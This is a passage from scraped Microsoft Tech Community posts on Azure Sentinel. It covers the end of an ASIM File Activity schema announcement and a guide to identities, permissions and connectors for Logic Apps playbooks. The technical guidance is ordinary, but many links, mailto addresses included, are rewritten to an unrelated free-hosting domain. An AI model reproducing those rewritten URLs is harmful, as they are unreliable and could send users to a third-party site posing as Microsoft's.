schema</A>, and deploy the&nbsp;File Activity&nbsp;parser packs in a single click using an <A href="#" target="_blank" rel="noopener">ARM template</A>.&nbsp;</P> <P>&nbsp;</P> <P>Join us to learn more about the Azure Sentinel information model in&nbsp;<A href="#" target="_blank" rel="noopener">two webinars</A>:</P> <P>&nbsp;</P> <UL> <LI><STRONG>The Information Model: Understanding Normalization in Azure Sentinel: <A href="#" target="_blank" rel="noopener">Presentation</A>, <A href="#" target="_blank" rel="noopener">YouTube</A>.</STRONG></LI> <LI><STRONG>Deep Dive into Azure Sentinel Normalizing Parsers and Normalized Content: next week, register <A href="#" target="_blank" rel="noopener">here</A>.</STRONG></LI> </UL> <P><STRONG>&nbsp;</STRONG></P> <P>Special thanks to&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=mailto:Yaron.Fruchtmann@microsoft.com" target="_blank" rel="noopener">@Yaron Fruchtmann</A>, who made all this possible.</P> <P>&nbsp;</P> <H2>Why normalization, and what is the Azure Sentinel Information Model?</H2> <P>&nbsp;</P> <P>Working with various data types and tables together presents a challenge. You must become familiar with many different data types and schemas, write and use a unique set of analytics rules, workbooks, and hunting queries for each, even for those that share commonalities (for example, DNS servers). Correlation between the different data types necessary for investigation and hunting is also tricky.</P> <P>&nbsp;</P> <P>The Azure Sentinel Information Model (ASIM) provides a seamless experience for handling various sources in uniform, normalized views. ASIM aligns with the&nbsp;<A href="#" target="_blank" rel="noopener">Open-Source Security Events Metadata (OSSEM)</A>&nbsp;common information model, promoting vendor agnostic, industry-wide normalization. ASIM:</P> <UL> <LI>Allows source agnostic content and solutions</LI> <LI>Simplifies analyst use of the data in sentinel workspaces</LI> </UL> <P>&nbsp;</P> <P>The current implementation is based on query time normalization using KQL functions. And includes the following:</P> <UL> <LI><STRONG>Normalized schemas</STRONG>&nbsp;cover standard sets of predictable event types that are easy to work with and build unified capabilities. The schema defines which fields should represent an event, a normalized column naming convention, and a standard format for the field values.</LI> <LI><STRONG>Parsers</STRONG>&nbsp;map existing data to the normalized schemas. Parsers are implemented using <A href="#" target="_blank" rel="noopener">KQL functions</A>.</LI> <LI><STRONG>Content for each normalized schema</STRONG>&nbsp;includes analytics rules, workbooks, hunting queries, and additional content. This content works on any normalized data without the need to create source-specific content.</LI> </UL> <P>Thanks!</P> Wed, 04 Aug 2021 12:00:11 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-asim-file-activity-schema/ba-p/2609732 Ofer_Shezaf 2021-08-04T12:00:11Z Understanding API connections for your Azure Sentinel Playbooks https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/understanding-api-connections-for-your-azure-sentinel-playbooks/ba-p/2593973 <P>In addition to being a Security Information and Event Management (SIEM) tool, Azure Sentinel is a Security Orchestration, Automation, and Response (SOAR) platform. Automation takes a few different forms in Azure Sentinel, from automation rules that centrally manage the automation of incident handling and response, to playbooks that run predetermined sequences of actions to provide powerful and flexible advanced automation to your threat response tasks.</P> <P>&nbsp;</P> <P><STRONG>In this blog we will be focusing on playbooks and understanding application programming interface (API) permissions, connections, and connectors in Azure Sentinel playbooks.</STRONG></P> <P>&nbsp;</P> <P>A playbook is a collection of response/remediation actions and logic that can be run from Azure Sentinel as a routine. It is based on workflows built in Azure Logic Apps which is a cloud service that helps you schedule, automate, and orchestrate tasks and workflows across systems throughout the enterprise. They are very powerful as they interact with Azure Sentinel features (they can update your incidents, update watchlists, etc.), and also with other Azure or Microsoft services and even third-party services. Whether you use out-of-the-box playbook connectors or the more generic HTTP connector, ultimately you will be interacting with various APIs.</P> <P>&nbsp;</P> <P>When creating playbooks, solutions that we want to use to automate tasks need to have their own connector in Logic Apps (like Office 365 Outlook, Azure Sentinel, Microsoft Teams, Azure Monitor Logs…) or to have possibility to interact via API so that we can use the generic HTTP connector. As each connector needs to create an API connection to the solution and authorize it, if you are getting started with playbooks you may find it challenging to figure out what permissions are required. For example, our playbook templates on GitHub may come with multiple connections. When you first deploy a template, you may notice the playbook fails when you run it for the first time due to lack of permissions. <STRONG>In this blog post we will cover some of the main connectors you may encounter when you use Azure Sentinel playbooks, different methods to authenticate, as well as permissions you may require</STRONG>.</P> <P>&nbsp;</P> <P>Before we move into specifics about identities and connectors, let’s quickly revisit the <STRONG>permissions needed to create and run a playbook in Logic Apps</STRONG>:</P> <UL> <LI>Permissions required to create a Logic App: <UL> <LI>Logic App Contributor in the Resource Group (RG) where the Logic App has been created</LI> </UL> </LI> <LI>Permissions required to run a Logic App: <UL> <LI>Azure Sentinel Responder in the RG where your Azure Sentinel workspace resides</LI> </UL> </LI> </UL> <UL> <LI>Permissions required for an Azure Sentinel automation rule to run a playbook: <UL> <LI>Azure Sentinel Automation Contributor in the RG where the playbook to be triggered by the automation rule resides (these are explicit permissions for a special Azure Sentinel service account specifically authorized to trigger playbooks from automation rules. It is not meant for user accounts.)</LI> </UL> </LI> </UL> <P>&nbsp;</P> <H2>Authorizing Connections</H2> <P>The first topic that we will cover are the type of identities you can use in a playbook to authorize a connection between Logic Apps and the solution of your choice. There are <STRONG>three types of identities</STRONG>:</P> <OL> <LI>Managed identity</LI> <LI>Service principal</LI> <LI>User identity</LI> </OL> <H3><SPAN>Managed Identity</SPAN></H3> <P><SPAN>A common challenge for developers is the management of secrets and credentials used to secure communication between different components making up a solution. Managed identities eliminate the need for developers to manage credentials. To enable managed identity on your Logic App, you need to go under <EM>Identity</EM></SPAN><SPAN>, and choose from: </SPAN></P> <UL> <LI><SPAN>A <EM>System assigned managed identity</EM> that turns your Logic App into an identity/service account to which you can provide permissions.</SPAN></LI> <LI><SPAN>A <EM>User-assigned managed identity</EM> which creates a separate Azure resource to which you can assign roles and permissions, and you can reuse on other Logic Apps. </SPAN></LI> </UL> <P><SPAN>After enabling a managed identity we have to assign appropriate permissions to it. If we use it with the Azure Sentinel connector, based on actions that connector will perform, we need to assign Azure Sentinel Reader, Azure Sentinel Responder, or Azure Sentinel Contributor role.</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture1.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298983iFA78802C742C52EC/image-size/large?v=v2&amp;px=999" role="button" title="Picture1.png" alt="Picture1.png" /></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture2.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298984iC12A419FE5D0F1D6/image-size/large?v=v2&amp;px=999" role="button" title="Picture2.png" alt="Picture2.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">It is important to note that&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">managed identity is in preview and is available only to the subset of&nbsp;connectors</SPAN></STRONG><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Note that&nbsp;there&nbsp;is&nbsp;hard limit of&nbsp;2000 role assignments per subscription.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Managed identity is&nbsp;the&nbsp;recommended approach&nbsp;to authorize connections&nbsp;for playbooks. For more info about interaction between managed identity and&nbsp;playbooks,&nbsp;check&nbsp;this blog -&nbsp;</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-managed-identity-for-azure-sentinel-logic-apps/ba-p/2068204" target="_blank" rel="noopener"><SPAN data-contrast="none">What’s new: Managed Identity for Azure Sentinel Logic Apps connector - Microsoft Tech Community</SPAN></A><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H3 aria-level="5"><SPAN data-contrast="none">Service&nbsp;principal</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="auto">A service&nbsp;principal is an identity assigned when you register an application in the Azure AD.&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Click here</SPAN></A><SPAN data-contrast="auto">&nbsp;to&nbsp;see&nbsp;instructions&nbsp;on&nbsp;how to create&nbsp;an&nbsp;app registration as well as how to get&nbsp;an&nbsp;Application ID, Tenant ID,&nbsp;and to generate a secret that you will need to authorize&nbsp;a Logic App&nbsp;connection with&nbsp;a service&nbsp;principal.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture3.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298985iB4346634FD7361E0/image-size/large?v=v2&amp;px=999" role="button" title="Picture3.png" alt="Picture3.png" /></span></P> <P>&nbsp;</P> <P><SPAN class="TextRun SCXW268393154 BCX8" data-contrast="auto"><SPAN class="NormalTextRun SCXW268393154 BCX8">A s</SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8">ervice<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8">p</SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8">rincipal needs to have appropriate permissions to be able to<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8">perform a task</SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8">.</SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8"><SPAN>&nbsp;</SPAN>In</SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8"><SPAN>&nbsp;</SPAN>the</SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8"><SPAN>&nbsp;</SPAN>case of Azure Monitor Logs</SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8"><SPAN>&nbsp;</SPAN>for example</SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8">, we need to have Log Analytics Reader<SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8">role-based access control (RBAC)</SPAN><SPAN class="NormalTextRun SCXW268393154 BCX8"><SPAN>&nbsp;</SPAN>assigned to the service principal.</SPAN></SPAN><SPAN class="EOP SCXW268393154 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture4.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298989iC642D49B8D1EBE23/image-size/medium?v=v2&amp;px=400" role="button" title="Picture4.png" alt="Picture4.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Once you create&nbsp;a service&nbsp;principal you can use it on multiple playbooks:&nbsp;in our example,&nbsp;we used&nbsp;a service&nbsp;principal for Azure Monitor&nbsp;Logs&nbsp;and we can reuse that connection for each playbook where we have&nbsp;an&nbsp;Azure Monitor Logs connector.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Note:&nbsp;&nbsp;You&nbsp;must&nbsp;manage&nbsp;your&nbsp;service&nbsp;principal’s secret&nbsp;and&nbsp;store it to&nbsp;a&nbsp;secure place&nbsp;(e.g..&nbsp;Key Vault). This&nbsp;adds&nbsp;additional&nbsp;admin work since you&nbsp;will need to&nbsp;keep track of&nbsp;your service principal&nbsp;secrets as well as&nbsp;their&nbsp;expiration date. If&nbsp;the service principal’s&nbsp;secret expires, connections made with that service principal will stop&nbsp;working, which could have an adverse effect on your security operations.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P aria-level="3"><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="3"><SPAN data-contrast="none">User account</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="auto">This is the most straightforward option&nbsp;in terms of identities,&nbsp;because you need to sign in with your user account or user account that has&nbsp;the required&nbsp;privileges.&nbsp;To use&nbsp;this, go to the Logic&nbsp;App and select&nbsp;</SPAN><I><SPAN data-contrast="auto">API connections</SPAN></I><SPAN data-contrast="auto">&nbsp;then select the API connection they want to authorize, select&nbsp;</SPAN><I><SPAN data-contrast="auto">Edit API connection</SPAN></I><SPAN data-contrast="auto">&nbsp;and&nbsp;select&nbsp;</SPAN><I><SPAN data-contrast="auto">Authorize</SPAN></I><SPAN data-contrast="auto">&nbsp;and&nbsp;</SPAN><I><SPAN data-contrast="auto">Save</SPAN></I><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture5.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298993i8AC286AB57CA25CF/image-size/large?v=v2&amp;px=999" role="button" title="Picture5.png" alt="Picture5.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Or&nbsp;you can&nbsp;sign in from&nbsp;the&nbsp;Logic App&nbsp;designer&nbsp;view, as seen in the below screenshot:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture6.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298994iAD00B10FA4F5F5DC/image-size/large?v=v2&amp;px=999" role="button" title="Picture6.png" alt="Picture6.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P>To successfully authorize a connection with a user identity, the user needs to have the appropriate license/permissions assigned to them. If we look at the Office 365 Outlook connector, the user needs to have an Exchange Online license assigned.&nbsp; If we want to use a user identity with Azure Monitor Logs connector then the user must have the Log Analytics Reader permission assigned to them.</P> <P>&nbsp;</P> <P>Whilst this option is often the most convenient for users, there are downsides to using a user identity:</P> <UL> <LI>&nbsp;It is harder to audit what actions were taken by a user and what actions were taken by the playbook.</LI> <LI>If a user leaves the organization you need to update all the connections that use that identity to another user account.</LI> <LI>&nbsp;If a user’s permissions or license changes &nbsp;(e.g. they don’t use Exchange Online anymore or don’t have the Log Analytics Reader permissions anymore) you will need to update these connections to a user identity with the correct licensing/permissions.</LI> </UL> <H2>&nbsp;</H2> <H2>Connectors</H2> <P><SPAN>Now, let’s have a look at some of the main playbook connectors you will use for Azure Sentinel.</SPAN></P> <P>&nbsp;</P> <H3>Azure Sentinel</H3> <P>The Azure Sentinel connector can be used to trigger a playbook when an incident is created or with a manual trigger on the alert. The Azure Sentinel connector relies on the <U>Azure Sentinel REST API</U> and allows you to get incidents, update incidents, update watchlists, etc.</P> <P>&nbsp;</P> <P><SPAN>Connection options:</SPAN></P> <UL> <LI><SPAN>Managed identity (Recommended)</SPAN></LI> <LI><SPAN>Service Principal</SPAN></LI> <LI><SPAN>User identity</SPAN></LI> </UL> <P><SPAN>Other prerequisites: </SPAN></P> <UL> <LI>Azure Sentinel Reader role (if you only want to get information from an incident e.g., Get Entities)</LI> <LI>Azure Sentinel Operator role (if you want to update an incident); or</LI> <LI>Azure Sentinel Contributor role (if you want to make changes on your workspace e.g., update a watchlist).</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture7.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298995i2F582DC2ACFE4F19/image-size/medium?v=v2&amp;px=400" role="button" title="Picture7.png" alt="Picture7.png" /></span></P> <P>Once you have set up the connection you will notice that a new API connection has been &nbsp;created in the Logic App under API connections:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture8.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298996i934B585E4FBEFAD0/image-size/large?v=v2&amp;px=999" role="button" title="Picture8.png" alt="Picture8.png" /></span></P> <P>&nbsp;</P> <H3 id="h_68003073211627482487828">Microsoft Graph Security</H3> <P>Sometimes you might need to connect to the Graph Security API. For example, you can use the Microsoft Graph Security API to import Threat Intelligence (TI) indicators into Azure Sentinel. &nbsp;If you want to add TI indicators to your Threatintelligence table, there is a connector that calls the Graph Security API to do this:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture9.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298997i4B92430B02B0669E/image-size/medium?v=v2&amp;px=400" role="button" title="Picture9.png" alt="Picture9.png" /></span></P> <P>To find out which permissions you need, you should refer to the <SPAN><A href="#" target="_blank" rel="noopener">Graph API documentation</A></SPAN>, and for this specific example refer to <SPAN><A href="#" target="_blank" rel="noopener">tiIndicator: submitTiIndicators - Microsoft Graph beta | Microsoft Docs</A></SPAN>. On the Permissions section, you will see it requires ThreatIndicators.ReadWrite.OwnedBy.</P> <P>&nbsp;</P> <P>Again, here you can connect with your user or with a managed identity:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture10.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298998i5B0D36615ED30A84/image-size/medium?v=v2&amp;px=400" role="button" title="Picture10.png" alt="Picture10.png" /></span></P> <P>&nbsp;</P> <UL> <LI><STRONG>Managed identity</STRONG>: this option is in preview and for now it is not possible to assign the required Graph API permission through the portal. If you want to choose this type of connection, you can assign the permission with PowerShell. If you want to explore this workaround, you can have a look at the personal blog “Rahul Nath” for&nbsp;<A href="#" target="_blank" rel="noopener">instructions</A>. &nbsp;</LI> <LI><STRONG>Signing in with a user</STRONG>: this is the most straightforward option, but there are some downsides as explained earlier in the blog. Unless your user is allowed to establish a connection, you will need a Security Administrator or Global Administrator to authorize it. This can be done in Logic Apps under API Connections, and then Edit API connection</LI> </UL> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture11.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298999i70ACDC74061021FF/image-size/medium?v=v2&amp;px=400" role="button" title="Picture11.png" alt="Picture11.png" /></span></P> <P>&nbsp;</P> <H2><SPAN>HTTP connector</SPAN></H2> <P><SPAN>This connector allows you to make a GET, PUT, POST, PATCH or DELETE API call to solutions that are supporting API connections. If you need to get specific information from the solution, and the connector is not available or the</SPAN><SPAN> connector natively doesn’t support that action, while solutions support API calls, we can use an HTTP connector to get that data. </SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture12.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299000i8AB93CB0F787D2B0/image-size/large?v=v2&amp;px=999" role="button" title="Picture12.png" alt="Picture12.png" /></span></P> <P>&nbsp;</P> <P><SPAN>For example, since the Microsoft 365 Defender (M365D) connector does not synchronize comments, we can use an API GET call to ingest comments from M365D and update the Sentinel comment section with those values. In terms of permissions, what is required depends on the solution:</SPAN></P> <UL> <LI><STRONG><SPAN>Microsoft Graph API: </SPAN></STRONG><SPAN>to understand the right permissions, please check the <A href="https://gorovian.000webhostapp.com/?exam=#h_68003073211627482487828" target="_self">Microsoft Graph API section</A> in this article:</SPAN> <UL> <LI><STRONG><SPAN>Managed identity</SPAN></STRONG><SPAN>: Please check the Managed identity under the <A href="https://gorovian.000webhostapp.com/?exam=#h_68003073211627482487828" target="_self">Microsoft Graph API section</A></SPAN><SPAN>.</SPAN></LI> <LI><STRONG><SPAN>Active Directory OAuth:</SPAN></STRONG><SPAN> If your endpoint is the Microsoft Graph API, you can find instructions <A href="#" target="_blank" rel="noopener">here</A>. </SPAN></LI> </UL> </LI> <LI><STRONG><SPAN>The </SPAN></STRONG><A href="#" target="_blank" rel="noopener"><STRONG>http://management.azure.com</STRONG></A><STRONG> audience: </STRONG>If your endpoint is part of <A href="#" target="_blank" rel="noopener">http://management.azure.com</A>, you will have to assign the right permissions for the endpoint you want to call. Let’s imagine you want to create a watchlist using REST API <A href="#" target="_blank" rel="noopener">Manage watchlists in Azure Sentinel using REST API | Microsoft Docs</A>. In this case, the endpoint is&nbsp;<A href="#" target="_blank" rel="noopener">https://management.azure.com/subscriptions/{{subscriptionId}}/resourceGroups/{{resourceGroupName}}/providers/Microsoft.OperationalInsights/workspaces/{{workspaceName}}/providers/Microsoft.SecurityInsights/watchlists/{{watchlistAlias}}?api-version={{api-version</A>}}&nbsp;and the permission required would be Azure Sentinel Contributor. Knowing the permission you need will require some basic knowledge of the service. <UL> <LI><STRONG><SPAN>Managed identity</SPAN></STRONG><SPAN>: you will assign the right role to the managed identity itself; you can do it from the Access control (IAM) on the resource for which you want to provide permission.</SPAN></LI> <LI><STRONG style="font-family: inherit;">Active Directory OAuth:</STRONG><SPAN style="font-family: inherit;"> in this case, you will assign the permission on the app registration itself.</SPAN></LI> </UL> </LI> </UL> <P>&nbsp;</P> <H3>Key Vault</H3> <P>If you are using a service principal and want to save the secret in a secure place, the best practice is to store them in <SPAN><A href="#" target="_blank" rel="noopener">Key Vault</A></SPAN>. But what if we want to use this secret in our playbook for the HTTP connector explained above? In this scenario we have the Key Vault connector.</P> <P>&nbsp;</P> <P><SPAN>Options for connecting:</SPAN></P> <UL> <LI><SPAN>Managed identity (Recommended)</SPAN></LI> <LI><SPAN>Service Principal</SPAN></LI> <LI><SPAN>User identity</SPAN></LI> </UL> <P><SPAN>Other prerequisites: </SPAN></P> <UL> <LI><SPAN>Managed identity/service principal/user identity authorizing the connection must have assigned </SPAN>permissions to read the secret (Key Vault Secrets User to read; Key Vault Secrets Officer to manage). Instructions to assign these permissions can be found by clicking on <SPAN><A href="#" target="_blank" rel="noopener">this link</A></SPAN>.</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture13.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299002iA48830319C4CEF1B/image-size/medium?v=v2&amp;px=400" role="button" title="Picture13.png" alt="Picture13.png" /></span></P> <P>You can use a Key Vault action to get a secret and use that secret inside of the playbook.</P> <P>One more option with the Key Vault connector also is to turn on Secure Inputs and Secure Outputs features.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture14.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299003i3B43EB8D0ADF5F11/image-size/large?v=v2&amp;px=999" role="button" title="Picture14.png" alt="Picture14.png" /></span></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture15.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299004i9B84033E5408FCBA/image-size/large?v=v2&amp;px=999" role="button" title="Picture15.png" alt="Picture15.png" /></span></P> <P>With this feature on, when the playbook runs a Key Vault action, the input and output content will be hidden by default.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture16.png" style="width: 992px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299005i66F304BFC23EDD97/image-size/large?v=v2&amp;px=999" role="button" title="Picture16.png" alt="Picture16.png" /></span></P> <P>&nbsp;</P> <H3>Azure Monitor Logs</H3> <P>You will need to use the Azure Monitor Logs connector when you want to run a query against the data in your Azure Sentinel workspace from a Logic App. This can be used when we want to get more data about incident/alert entities before we decide what kind of action we will take. For example, we have a Watchlist with VIP users, and we want to cross-reference it with Accounts in the incident/alert. If the Account in the incident/alert is also in the Watchlist, then we will change the severity of the incident to High.</P> <P>&nbsp;</P> <P><SPAN>Options for connecting:</SPAN></P> <UL> <LI><SPAN>Service principal (recommended)</SPAN></LI> <LI><SPAN>User identity</SPAN></LI> </UL> <P><SPAN>Other prerequisites: </SPAN></P> <UL> <LI><SPAN>Service principal/user identity authorizing connection must have the </SPAN>Log Analytics Reader role assigned</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture17.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299007iC1ED8480F9DC4E8D/image-size/medium?v=v2&amp;px=400" role="button" title="Picture17.png" alt="Picture17.png" /></span></P> <P>Here is the query in the Azure Monitor Logs Logic App connector:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture18.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299008iDB19BC2282EC15A6/image-size/large?v=v2&amp;px=999" role="button" title="Picture18.png" alt="Picture18.png" /></span></P> <P>&nbsp;</P> <H3>Office 365 Outlook</H3> <P>Whenever you want to send an email notification, send an email approval, flag an email, forward an email etc., you can use the Office 365 Outlook connector.</P> <P>&nbsp;</P> <P><SPAN>Options for connecting:</SPAN></P> <UL> <LI><SPAN>User identity</SPAN></LI> </UL> <P><SPAN>Other prerequisites: </SPAN></P> <UL> <LI><SPAN>User authorizing connection must have an Exchange Online license assigned</SPAN></LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture19.png" style="width: 567px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299009iE2927AD5A50338AF/image-size/large?v=v2&amp;px=999" role="button" title="Picture19.png" alt="Picture19.png" /></span></P> <P>&nbsp;</P> <P>There are different options to configure when using this connector e.g. add people to CC or BCC, add Attachment, configure the email address to use when replying, or change the importance of the email.</P> <P>&nbsp;</P> <P>An important part of this connector to understand is the “From (Send As)” parameter. This is important because when you authorize a connection with the user identity, all emails will be sent from that account.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture20.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299011iF86E2C38049B1391/image-size/large?v=v2&amp;px=999" role="button" title="Picture20.png" alt="Picture20.png" /></span></P> <P>&nbsp;</P> <P>The “From (Send As)” parameter gives us the option to change from whom that email will be sent from to an Microsoft 365 Group, shared mailbox or some other user. Note that a valid Send As configuration must be applied to the mailbox so that it can send emails successfully.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture21.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299016i0081853E9AF76278/image-size/large?v=v2&amp;px=999" role="button" title="Picture21.png" alt="Picture21.png" /></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture22.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299017iAB412296CBC58724/image-size/large?v=v2&amp;px=999" role="button" title="Picture22.png" alt="Picture22.png" /></span></P> <P>&nbsp;</P> <P>Another option is to have one specific user account, like <A href="https://gorovian.000webhostapp.com/?exam=mailto:soc@xyz.com" target="_blank" rel="noopener">soc@xyz.com</A>, which you will use to authorize Office 365 Outlook connection and all emails will appear as if they are sent from <A href="https://gorovian.000webhostapp.com/?exam=mailto:soc@xyz.com" target="_blank" rel="noopener">soc@xyz.com</A>. Please note that the account used for this must be a user account (no Microsoft 365 Group or shared mailbox), and it must have a valid Exchange Online license/mailbox</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture23.png" style="width: 799px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299018iCCB332254BF39F32/image-size/large?v=v2&amp;px=999" role="button" title="Picture23.png" alt="Picture23.png" /></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Picture25.png" style="width: 567px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299019i1B36733965A3752F/image-size/large?v=v2&amp;px=999" role="button" title="Picture25.png" alt="Picture25.png" /></span></P> <P>&nbsp;</P> <H3>Microsoft Teams</H3> <P><SPAN>Microsoft Teams is another popular connector that can be used for sending notifications. As</SPAN><SPAN> Microsoft Teams plays a big role in organizing teams and providing a place to centralize collections of information and has become even more critical since the pandemic, it’s a useful tool to integrate into your SOC operations and automation</SPAN><SPAN>. </SPAN></P> <P><SPAN>&nbsp;</SPAN></P> <P><SPAN>Options for connecting:</SPAN></P> <UL> <LI><SPAN>User identity</SPAN></LI> </UL> <P><SPAN>Other prerequisites: </SPAN></P> <UL> <LI><SPAN>User authorizing connection must have a Microsoft Teams license assigned, and</SPAN></LI> <LI>Specific permissions (to post a message to a channel, the user must be a member of that team; to add a member – must be owner; to create a new team group – must have permission to create a Microsoft 365 Group…)</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture26.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/299020i1E2008FBFF45B6FC/image-size/medium?v=v2&amp;px=400" role="button" title="Picture26.png" alt="Picture26.png" /></span></P> 